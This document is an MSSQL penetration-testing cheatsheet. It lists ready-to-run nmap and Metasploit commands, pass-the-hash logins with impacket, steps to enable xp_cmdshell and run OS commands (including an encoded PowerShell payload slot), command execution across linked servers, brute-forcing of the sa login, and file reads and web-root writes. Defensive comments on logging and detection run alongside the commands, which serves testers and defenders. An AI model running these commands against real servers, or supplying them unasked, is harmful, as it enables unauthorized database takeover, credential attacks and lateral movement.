MSSQL Enumeration Cheatsheet

Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser)


Discovery & Nmap Scripts

# Unauthenticated version/instance discovery (TDS prelogin; SQL Browser on UDP 1434 where reachable)
nmap -p 1433 --script ms-sql-info <ip>
# Authenticated: needs mssql.username/mssql.password script args (or a prior brute/empty-password hit)
nmap -p 1433 --script ms-sql-config <ip>
# The next two perform real login attempts. With the default login-auditing setting
# ("failed logins only") each failure lands in the SQL Server ERRORLOG and the Windows
# Application log (error 18456), so they are noisy and a good alerting source for defenders.
nmap -p 1433 --script ms-sql-empty-password <ip>
nmap -p 1433 --script ms-sql-brute <ip>
nmap -sU -p 1434 --script ms-sql-dac <ip>     # Ask SQL Browser (UDP 1434) for the instance's dynamic DAC port
nmap -p 1433 --script ms-sql-* <ip>            # All MSSQL scripts (includes the login-attempting ones above)

Metasploit Modules

use auxiliary/scanner/mssql/mssql_ping        # Discovery + version (queries SQL Browser over UDP 1434)
use auxiliary/scanner/mssql/mssql_login       # Brute force auth (every failure is audited as error 18456 by default)
use auxiliary/admin/mssql/mssql_sql           # Execute SQL query
# mssql_exec depends on xp_cmdshell; the sp_configure change it makes when the procedure is
# off (presumably, verify against the module source) is written to the ERRORLOG, and each
# command shows up as cmd.exe spawned by sqlservr.exe — the two signals to monitor.
use auxiliary/admin/mssql/mssql_exec          # OS command execution (xp_cmdshell)
use auxiliary/admin/mssql/mssql_enum          # Full enumeration
use auxiliary/admin/mssql/mssql_enum_sql_logins  # Enumerate SQL logins

mssqlclient.py (impacket)

# Connect with SQL auth (login name is what appears in the ERRORLOG / login audit)
python3 mssqlclient.py <user>:<pass>@<ip>

# Connect with Windows auth (NTLM/Kerberos over TDS; domain account appears in the audit)
python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth

# Connect with hash (Pass-the-Hash) — -hashes takes LMHASH:NTHASH, the LM half may be empty.
# Only works with Windows auth, which is why -windows-auth is required here.
python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth

Useful SQL Queries

-- Version and user info
-- system_user is the connecting login; user_name() is the database user that login maps to
-- in the current database (they differ when the login is mapped to a differently named user).
SELECT @@version;
SELECT system_user;
SELECT user_name();
SELECT DB_NAME();

-- Check if sysadmin
-- Both functions return 1 (member), 0 (not a member) or NULL (role name invalid / not visible).
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_MEMBER('db_owner');

-- List databases
-- sys.databases shows every database because VIEW ANY DATABASE is granted to public by default;
-- revoking it from public limits what a low-privilege login can enumerate here.
SELECT name FROM sys.databases;
USE <database>;
SELECT table_name FROM information_schema.tables;

-- List users and roles
-- sys.server_principals is the current catalog view (logins AND server roles; type_desc tells
-- them apart). sys.syslogins is a SQL Server 2000 compatibility view kept only for backward
-- compatibility and may be removed in a future version.
SELECT name, type_desc FROM sys.server_principals;
SELECT name FROM sys.syslogins;
-- Server roles held by a single login. The unaliased qualifier "server_role_members" resolves
-- to sys.server_role_members (T-SQL allows the schema to be dropped in column qualifiers).
SELECT roles.name FROM sys.server_role_members
  JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id
  JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id
  WHERE members.name = '<user>';

xp_cmdshell (OS Command Execution)

-- Enable xp_cmdshell (requires sysadmin)
-- Each sp_configure change is echoed as "Configuration option '...' changed from 0 to 1" and
-- written to the SQL Server ERRORLOG; sys.configurations (value_in_use) reflects it after
-- RECONFIGURE. Alerting on that log line / on value_in_use changing is the usual control.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run commands
-- Commands run under the SQL Server service account (non-sysadmin callers go through the
-- ##xp_cmdshell_proxy_account## credential instead). Every call spawns cmd.exe as a child of
-- sqlservr.exe, which is what process-creation telemetry (Sysmon event 1 / 4688) keys on.
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net user';
EXEC xp_cmdshell 'powershell -enc <base64payload>';

Linked Servers (Lateral Movement)

-- Enumerate linked servers
-- sys.servers includes the local server itself (server_id 0). The columns worth reading are
-- is_linked, is_rpc_out_enabled and data_source; sys.linked_logins shows which remote login
-- each link is mapped to — a link mapped to a high-privilege remote login is the thing to audit.
SELECT * FROM sys.servers;
EXEC sp_linkedservers;

-- Execute query on linked server
-- EXECUTE (...) AT requires the link's "RPC Out" option (is_rpc_out_enabled = 1); the query runs
-- with the rights of the mapped remote login, not necessarily those of the caller.
EXECUTE('SELECT @@version') AT [<linked_server>];
EXECUTE('SELECT system_user') AT [<linked_server>];

-- Execute OS command via linked server
-- Needs xp_cmdshell enabled on the REMOTE server; the resulting cmd.exe child of sqlservr.exe
-- appears on that host, so detection has to be in place there as well.
EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>];

Brute Force

# Online password guessing against the sa login. With default login auditing ("failed logins
# only") every failure is written to the ERRORLOG and the Windows Application log as error 18456,
# so this is loud; renaming/disabling sa and alerting on 18456 bursts are the standard mitigations.
hydra -l sa -P wordlist.txt mssql://<ip>
medusa -h <ip> -u sa -P wordlist.txt -M mssql
crackmapexec mssql <ip> -u <user> -p wordlist.txt

File Read / Write

-- Read file (via BULK INSERT or OPENROWSET)
-- Requires ADMINISTER BULK OPERATIONS (the bulkadmin fixed server role), and the file must be
-- readable by the SQL Server service account; keeping that grant off ordinary logins limits file reads.
SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t;

-- Write file (via xp_cmdshell)
-- Needs xp_cmdshell enabled (see the xp_cmdshell section); the file is created with the service
-- account's NTFS rights, so a service account that can write to web roots is the exposure here.
EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';